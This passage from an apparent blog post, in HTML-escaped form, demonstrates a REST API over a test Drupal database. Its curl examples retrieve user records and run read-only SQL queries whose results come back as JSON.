&lt;span class='go'&gt;                &amp;quot;sid&amp;quot;: &amp;quot;jq57PowPwDK1CuKBpC56oqt_PsbwWNF4av97BuQqr6I&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;ssid&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;hostname&amp;quot;: &amp;quot;75.147.9.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;timestamp&amp;quot;: 1355762574,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;cache&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;session&amp;quot;: &amp;quot;YmF0Y2hlc3xhOjE6e2k6MTtiOjE7fWF1dGhvcml6ZV9maWxldHJhbnNmZXJfaW5mb3xhOjE6e3M6MzoiZnRwIjthOjU6e3M6NToidGl0bGUiO3M6MzoiRlRQIjtzOjU6ImNsYXNzIjtzOjE1OiJGaWxlVHJhbnNmZXJGVFAiO3M6NDoiZmlsZSI7czo3OiJmdHAuaW5jIjtzOjk6ImZpbGUgcGF0aCI7czoyMToiaW5jbHVkZXMvZmlsZXRyYW5zZmVyIjtzOjY6IndlaWdodCI7aTowO319YXV0aG9yaXplX29wZXJhdGlvbnxhOjQ6e3M6ODoiY2FsbGJhY2siO3M6Mjg6InVwZGF0ZV9hdXRob3JpemVfcnVuX2luc3RhbGwiO3M6NDoiZmlsZSI7czozNToibW9kdWxlcy91cGRhdGUvdXBkYXRlLmF1dGhvcml6ZS5pbmMiO3M6OToiYXJndW1lbnRzIjthOjM6e3M6NzoicHJvamVjdCI7czo1OiJkZXZlbCI7czoxMjoidXBkYXRlcl9uYW1lIjtzOjEzOiJNb2R1bGVVcGRhdGVyIjtzOjk6ImxvY2FsX3VybCI7czozNzoiL3RtcC91cGRhdGUtZXh0cmFjdGlvbi1kOWU4MTUzOS9kZXZlbCI7fXM6MTA6InBhZ2VfdGl0bGUiO3M6MTQ6IlVwZGF0ZSBtYW5hZ2VyIjt9bWVzc2FnZXN8YToxOntzOjU6ImVycm9yIjthOjI6e2k6MDtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO2k6MTtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO319&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;rid&amp;quot;: 3&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;wid&amp;quot;: 160662,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;type&amp;quot;: &amp;quot;php&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;message&amp;quot;: &amp;quot;JXR5cGU6ICFtZXNzYWdlIGluICVmdW5jdGlvbiAobGluZSAlbGluZSBvZiAlZmlsZSku&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;variables&amp;quot;: &amp;quot;YTo2OntzOjU6IiV0eXBlIjtzOjc6Ildhcm5pbmciO3M6ODoiIW1lc3NhZ2UiO3M6NjI6ImFycmF5X2tleV9leGlzdHMoKSBleHBlY3RzIHBhcmFtZXRlciAyIHRvIGJlIGFycmF5LCBudWxsIGdpdmVuIjtzOjk6IiVmdW5jdGlvbiI7czoyMzoidGhlbWVfaW1hZ2VfZm9ybWF0dGVyKCkiO3M6NToiJWZpbGUiO3M6NDU6Ii92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYyI7czo1OiIlbGluZSI7aTo2MDU7czoxNDoic2V2ZXJpdHlfbGV2ZWwiO2k6NDt9&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;severity&amp;quot;: 4,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;link&amp;quot;: &amp;quot;0&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;location&amp;quot;: &amp;quot;aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;referer&amp;quot;: &amp;quot;aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;hostname&amp;quot;: &amp;quot;24.61.45.238&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;timestamp&amp;quot;: 1355406786&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ]&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
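&lt;p&gt;(If you want the pretty-printed form shown above directly, rather than formatting the JSON by hand, piping the response through Python&amp;#8217;s built-in formatter works fine:)&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;curl -s http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/1 | python -mjson.tool&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;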
&lt;p&gt;We also support multi-get, so you can retrieve a number of table groups in a single REST API call. For example, let&amp;#8217;s say I want to get information on two users:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/11467;10503&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 11467,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;clibriprofr&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;clibriprofr@default&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355360324,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 11463,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: []&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 10503,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;uuslosuwr&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;uuslosuwr@default&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355360324,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 10499,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: []&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our REST API also supports executing arbitrary SQL queries and returning the results as JSON. Let&amp;#8217;s try a simple example first:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=select%20count(*)%20from%20drupal.comment&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;_SQL_COL_1&amp;quot;:252462}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
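&lt;p&gt;As an aside, hand-encoding queries into the URL gets tedious quickly. &lt;code&gt;curl&lt;/code&gt; can do the percent-encoding for you with &lt;code&gt;-G --data-urlencode&lt;/code&gt;; the following request is equivalent to the one above:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -G -H &amp;quot;Content-Type: application/json&amp;quot; --data-urlencode &amp;quot;q=select count(*) from drupal.comment&amp;quot; &amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;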
&lt;p&gt;Here is another example of executing arbitrary SQL through our REST API, this time with a more complex query. The query we will use is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='o'&gt;*&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;drupal&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;drupal&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt; 
               &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
       &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt; &lt;span class='k'&gt;DESC&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
          &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;cid&lt;/span&gt; &lt;span class='k'&gt;DESC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;10&lt;/span&gt; &lt;span class='k'&gt;OFFSET&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running this query through our REST API, the result (again, nicely formatted) looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &amp;quot;Content-Type: application/json&amp;quot; &amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=SELECT%20c.*%20FROM%20drupal.comment%20c%20INNER%20JOIN%20drupal.node%20n%20ON%20n.nid%20=%20c.nid%20WHERE%20(c.status%20=%201)%20AND%20(n.status%20=%201)%20ORDER%20BY%20c.created%20DESC,%20c.cid%20DESC%20LIMIT%2010%20OFFSET%200&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304562,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93450,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;this is a test comment&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;75.147.9.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355418376,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355418376,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;posulliv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304561,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304558,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3636,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Enim Gemino Luctus Occuro Paulatim&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304560,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3633,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Abdo Ea Sudo Veniam Vulputate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;03/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304559,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3651,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Euismod Letalis Nisl Utinam Vicis&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;02/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304558,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3657,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Similis Te&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304557,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93448,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3630,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Loquor Modo Ut&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;02/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304556,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93448,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3648,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Abico Conventio Elit Quis&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304555,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3646,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Dolor Immitto Metuo Veniam&amp;quot;,&lt;/span&gt;
